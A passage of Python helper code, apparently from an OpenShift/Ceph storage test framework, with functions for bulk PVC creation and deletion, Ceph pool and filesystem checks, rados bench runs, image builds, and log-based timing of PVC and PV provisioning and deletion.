do_reload=False,
access_mode=constants.ACCESS_MODE_RWO,
burst=False,
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
burst (bool): True for bulk creation, False (default) for one-by-one creation
Returns:
ocs_objs (list): List of PVC objects
tmpdir (str): Full path of the directory holding the yaml files used for the bulk PVC creation (None when burst is False)
"""
if not burst:
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
volume_mode = "Block"
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name,
size=size,
namespace=namespace,
do_reload=do_reload,
access_mode=access_mode,
volume_mode=volume_mode,
)
for _ in range(number_of_pvc)
], None
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
pvc_data["spec"]["volumeMode"] = "Block"
else:
pvc_data["spec"]["volumeMode"] = None
# Create a temporary directory to hold the yaml files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info("Creating the PVC yaml files for creation in bulk")
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name("test", "pvc")
logger.info(f"Adding PVC with name {name}")
pvc_data["metadata"]["name"] = name
templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info("Creating all PVCs as bulk")
oc = OCP(kind="pod", namespace=namespace)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Allow the system 1 sec per PVC to create; this prevents any other
# command from running in the system during this period.
logger.info(
f"Going to sleep for {number_of_pvc} sec. "
"before starting to verify that the PVCs were created."
)
time.sleep(number_of_pvc)
return ocs_objs, tmpdir
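# A hypothetical usage sketch of the bulk (burst) mode; the returned yaml
# directory can later be handed to delete_bulk_pvcs():
#     pvc_objs, yaml_dir = create_multiple_pvcs(
#         sc_name=sc.name, namespace=project.namespace, number_of_pvc=50,
#         size="2Gi", burst=True,
#     )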
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list, namespace):
"""
Deletes all the pvcs created from yaml file in a provided dir
Args:
pvc_yaml_dir (str): Directory in which yaml file resides
pv_names_list (list): List of PV names to be deleted
namespace (str): Namespace of the resources
"""
oc = OCP(kind="pod", namespace=namespace)
cmd = f"delete -f {pvc_yaml_dir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
time.sleep(len(pv_names_list) / 2)
for pv_name in pv_names_list:
validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools"):
logger.info(f"POOLS are {pools}")
for pool in pools:
if pool_name in pool.get("poolname"):
return True
except TimeoutExpiredError:
return False
def get_pool_cr(pool_name):
"""
Get the pool CR even if the kind is unknown.
Args:
pool_name (str): The name of the pool to get the CR for.
Returns:
dict: The pool CR if the resource is found, None otherwise.
"""
logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
ocp_kind_cephblockpool = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
)
pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
if pool_cr is not None:
return pool_cr
else:
logger.info(
f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
f", checkging if it is kind={constants.CEPHFILESYSTEM}"
)
ocp_kind_cephfilesystem = ocp.OCP(
kind="CephFilesystem",
namespace=config.ENV_DATA["cluster_namespace"],
)
pool_cr = ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
return pool_cr
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph auth get-key client.admin")
return out["key"]
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph fs ls")
return out[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if the CephFileSystem is created on both the Ceph and OCP
sides, otherwise False (the failure cause is logged)
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get("metadata").get("name"):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info("Filesystem %s was not create at Openshift Side", fs_name)
return False
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
for out in pools:
result = out.get("name")
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return ceph_validate and ocp_validate
def create_ocs_object_from_kind_and_name(
kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
"""
Create OCS object from kind and name
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
namespace (str): the namespace of the resource.
Returns:
ocs_ci.ocs.resources.ocs.OCS (obj): returns OCS object from kind and name.
"""
ocp_object = OCP(kind=kind, resource_name=resource_name, namespace=namespace).get()
return OCS(**ocp_object)
def remove_ocs_object_from_list(kind, resource_name, object_list):
"""
Given a list of OCS objects, the function removes the object with kind and resource from the list
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
object_list (array): Array of OCS objects.
Returns:
(array): Array of OCS objects without removed object.
"""
for obj in object_list:
if obj.name == resource_name and obj.kind == kind:
object_list.remove(obj)
return object_list
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result["items"]
storageclass = [
item.get("metadata").get("name")
for item in sample
if (
(item.get("metadata").get("name") not in constants.IGNORE_SC_GP2)
and (item.get("metadata").get("name") not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""" "
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result["items"]
pool_list = [item.get("metadata").get("name") for item in sample]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrieve the CephFS name
Returns:
str: Name of the CephFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd("ceph fs ls")
return result[0]["name"]
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(node.get_worker_nodes())
for node_obj in node_objs:
logger.info(f'pulling image "{image_name}" on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f"podman pull {image_name}"]
)
def run_io_with_rados_bench(**kw):
"""
A task for radosbench. Runs the radosbench command on the specified pod. If
parameters are not provided, the task assumes a few default parameters. This
task runs the command in a synchronous fashion.
Args:
kw (dict): a dictionary of various radosbench parameters.
ex::
pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get("ceph_pods") # list of pod objects of ceph cluster
config = kw.get("config")
role = config.get("role", "client")
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get("idx", 0)
client = clients[idx]
op = config.get("op", "write")
cleanup = ["--no-cleanup", "--cleanup"][config.get("cleanup", True)]
pool = config.get("pool")
block = str(config.get("size", 4 << 20))
time = config.get("time", 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
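# A hypothetical invocation sketch; 'ceph_pods' and 'config' mirror the
# parameters documented in the docstring above:
#     run_io_with_rados_bench(
#         ceph_pods=ceph_pods,
#         config={"role": "client", "pool": "rbd", "op": "write", "time": 60},
#     )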
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay, BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): Name of the PV (from the deleted PVC) to validate
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(
pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
nodes (list): Node name for each pod will be selected from this list.
Returns:
list: list of Pod objects
"""
pod_objs = []
nodes_iter = cycle(nodes) if nodes else None
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
)
access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
if volume_mode == "Block":
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ""
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [
pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
for _ in range(1, pods_for_rwx)
]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image="quay.io/ocsci/fedora",
source_image_label="latest",
):
"""
Allows to create a build config using a Dockerfile specified as an
argument, eg.::
$ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'
creates a build with ``httpd`` installed.
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build the docker image from,
defaults to quay.io/ocsci/fedora as the base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
defaults to 'latest'
install_package (str): package to install over the base image
Returns:
ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ":" + source_image_label
if config.DEPLOYMENT.get("disconnected"):
base_image = mirror_image(image=base_image)
cmd = f"yum install -y {install_package}"
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
command = f"new-build -D $'{docker_file}' --name={image_name}"
kubeconfig = os.getenv("KUBECONFIG")
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f"Running command {oc_cmd}")
result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
if result.stderr.decode():
raise UnavailableBuildException(
f"Build creation failed with error: {result.stderr.decode()}"
)
out = result.stdout.decode()
logger.info(out)
if "Success" in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind="Pod", resource_name=image_name)
if pod_obj.wait_for_resource(
condition="Completed",
resource_name=f"{image_name}" + "-1-build",
timeout=300,
sleep=30,
):
logger.info(f"build {image_name} ready")
set_image_lookup(image_name)
logger.info(f"image {image_name} can now be consumed")
image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
return image_stream_obj
else:
raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example::
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind="ImageStream")
command = f"set image-lookup {image_name}"
logger.info(f'image lookup for image "{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_provision_time(interface, pvc_name, status="start"):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC for creation time measurement,
or a list of PVC objects
status (str): The status to get the time of - 'start' / 'end'
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the operation string to look for in the logs, based on the requested status
operation = "started"
if status.lower() == "end":
operation = "succeeded"
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for i in range(0, len(pvc_name)):
name = pvc_name[i].name
stat = [i for i in logs if re.search(f"provision.*{name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
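# A minimal usage sketch: derive the provisioning duration of a single PVC
# from the CSI provisioner logs:
#     start = get_provision_time(constants.CEPHBLOCKPOOL, pvc_obj.name, status="start")
#     end = get_provision_time(constants.CEPHBLOCKPOOL, pvc_obj.name, status="end")
#     duration_seconds = (end - start).total_seconds()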
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the ending time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
# End provisioning string may appear in logs several times, take here the latest one
mon_day = " ".join(end[-1].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
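# A hedged usage sketch, equivalent to the start/end example above in one call:
#     seconds = measure_pvc_creation_time(constants.CEPHBLOCKPOOL, pvc_obj.name)
#     logger.info(f"PVC {pvc_obj.name} was provisioned in {seconds} seconds")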
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# Wait added due to some delay in CSI log generation
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for name in pvc_name_list:
# check if PVC data is present in CSI logs
start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
if not start or not end:
no_data_list.append(name)
if no_data_list:
# Clear the collected logs and re-read the CSI logs after wait_time seconds
logger.info(f"PVC count without CSI create log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logger.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pvc creation data in CSI logs for {no_data_list}"
)
continue
else:
break
pvc_dict = dict()
this_year = str(datetime.datetime.now().year)
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(
interface, pv_name_list, wait_time=60, return_log_times=False
):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
        interface (str): The interface backing the PV
        pv_name_list (list): List of PV Names for measuring deletion time
        wait_time (int): Seconds to wait before collecting CSI log
        return_log_times (bool): Determines the return value -- if False, a dictionary of pv_names with the
            deletion time is returned; if True, a dictionary of pv_names with a tuple of (start_deletion_time,
            end_deletion_time) is returned
    Returns:
        pv_dict (dict): Dictionary where the pv_names are the keys. The value of each entry depends on the
            return_log_times argument and is either the corresponding deletion time (when return_log_times
            is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
    # wait to account for some delay in CSI log generation
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for pv in pv_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
if not start or not end:
no_data_list.append(pv)
if no_data_list:
            # Clear and re-read the CSI logs after wait_time seconds
logger.info(f"PV count without CSI delete log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logger.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pv deletion data in CSI logs for {no_data_list}"
)
continue
else:
break
pv_dict = dict()
this_year = str(datetime.datetime.now().year)
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start_tm = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
# Extract the deletion end time for the PV
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end_tm = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
total = end_time - start_time
if not return_log_times:
pv_dict[pv_name] = total.total_seconds()
else:
pv_dict[pv_name] = (start_tm, end_tm)
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
    Get the starting deletion time of a PV based on provisioner logs
    Args:
        interface (str): The interface backing the PV
        pv_name (str): Name of the PV for deletion time measurement
    Returns:
        datetime object: Start time of PV deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
    # Extract the starting time for the PV deletion
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
"""
    Get the ending deletion time of a PV based on provisioner logs
    Args:
        interface (str): The interface backing the PV
        pv_name (str): Name of the PV for deletion time measurement
    Returns:
        datetime object: End time of PV deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
    # Extract the end time for the PV deletion
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
        interface (str): The interface backing the PVC
        pv_name (str): Name of the backing PV for deletion time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
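# Illustrative usage sketch (the PV name below is hypothetical); note that the function
# takes the PV name rather than the PVC name, since the CSI delete log lines reference the PV:
#
#     deletion_time = measure_pvc_deletion_time(
#         interface=constants.CEPHBLOCKPOOL, pv_name="pvc-8a7cb6f1-example"
#     )
#     logger.info(f"PV was deleted in {deletion_time:.2f} seconds")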
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = "%Y-%m-%dT%H:%M:%SZ"
containers_start_time = {}
start_time = pod_obj.data["status"]["startTime"]
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data["status"]["containerStatuses"])):
started_time = pod_obj.data["status"]["containerStatuses"][container]["state"][
"running"
]["startedAt"]
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data["status"]["containerStatuses"][container]["name"]
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
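# Illustrative usage sketch, assuming 'app_pod' is an already running pod object
# (a hypothetical name); the result maps each container name to the seconds between the
# pod's startTime and the container's running startedAt timestamp:
#
#     start_times = pod_start_time(app_pod)
#     for container, seconds in start_times.items():
#         logger.info(f"Container {container} took {seconds}s to start")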
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind="StorageClass")
storage_classes = default_sc_obj.get().get("items")
storage_classes = [
sc for sc in storage_classes if "annotations" in sc.get("metadata")
]
return [
sc.get("metadata").get("name")
for sc in storage_classes
if sc.get("metadata")
.get("annotations")
.get("storageclass.kubernetes.io/is-default-class")
== "true"
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind="StorageClass")
if default_sc:
# Change the existing default Storageclass annotation to false
for sc in default_sc:
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"false"}}}\' '
)
patch_cmd = f"patch storageclass {sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"true"}}}\' '
)
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
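# Illustrative usage sketch: switch the cluster default StorageClass to the RBD class and
# verify the annotation took effect. The constant name is assumed here; substitute the
# actual StorageClass name used by the deployment:
#
#     change_default_storageclass(constants.DEFAULT_STORAGECLASS_RBD)
#     assert constants.DEFAULT_STORAGECLASS_RBD in get_default_storage_class()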
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
        interface (str): The interface backing the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
cmd = ""
valid_error = []
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist",
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} {get_cephfs_subvolumegroup()}"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
)
return False
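# Illustrative usage sketch: the image UUID is the trailing UUID portion of the PV's CSI
# volumeHandle (see the docstring above); 'pv_data' here is a hypothetical PV dict:
#
#     volume_handle = pv_data["spec"]["csi"]["volumeHandle"]
#     image_uuid = volume_handle[-36:]  # UUIDs are 36 characters long
#     present = is_volume_present_in_backend(
#         interface=constants.CEPHBLOCKPOOL,
#         image_uuid=image_uuid,
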